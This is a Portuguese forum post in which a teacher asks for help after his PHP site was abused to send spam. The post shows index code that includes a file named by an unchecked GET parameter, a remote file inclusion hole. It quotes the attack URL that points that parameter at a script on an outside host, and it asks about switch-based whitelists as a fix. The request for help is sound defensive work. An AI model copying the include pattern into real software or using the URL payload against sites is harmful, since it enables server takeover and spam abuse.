Problemas Graves De Segurança - (spam)

E ai Galera

Estou com um problema muito grave

Estão invadindo meu site e enviando milhoes de spans o que acarretou a suspensão da minha pagina

estou trabalhando com PHP com o seguinte codigo na pagina index

CODE

<?

$id = $_GET['id'];

?>

<?php if(!empty($id)) { include ($id.".php");} else{ include ("site2008/home.php"); } ?>

esta acontecendo esse problema é adicionada um URL com um código de envio:

/index.php?id=http://www.agitonailha.kit.net/CorreiosOnline.txt?

Preciso de um codigo mais seguro para evitar essas invasões

Será que alguem poderia me ajudar

E ai galera

Encontrei 2 soluções porem tenho um duvida. Li na net que esses codigos é são mais seguro mas as duvidas são as mesmas

Primeiro Codigo

<?php

// Inclui o cabeçalho da página:

include ( “cabecalho.php”);

// Inclui a página requisitada:

switch ( $pagina)

{

case “inicial”:

include “inicial.php”;

break;

case “contato”:

include “contato.php”;

break;

case “clientes”:

include “clientes.php”;

break;

default:

echo “A página requisitada não pode ser encontrada.”;

break;

}

// Inclui o rodapé da pagina:

include ( “rodape.php”);

?>

Segundo Codigo li aqui mesmo

http://forum.imasters.com.br/index.php...mp;hl=segurança

Porem minha dúvido é nesses exemplos constam 3 paginas (inicial - Contato - Clientes ou pagina 1 pagina 2 e pagina 3) porem meu site tem mais de 70 como eu faço? faço o código acima contendo as 70 paginas???? e ainda por cima diariamente é acrescentada uma nova pagina de visualização com o trabalho de meus alunos

tipo: visualizar_trabalho0408_aluno3.php como eu faç para autorizar essa atualização? e continuar com meu codigo seguro???

Obrigado

Como eu faço nesse caso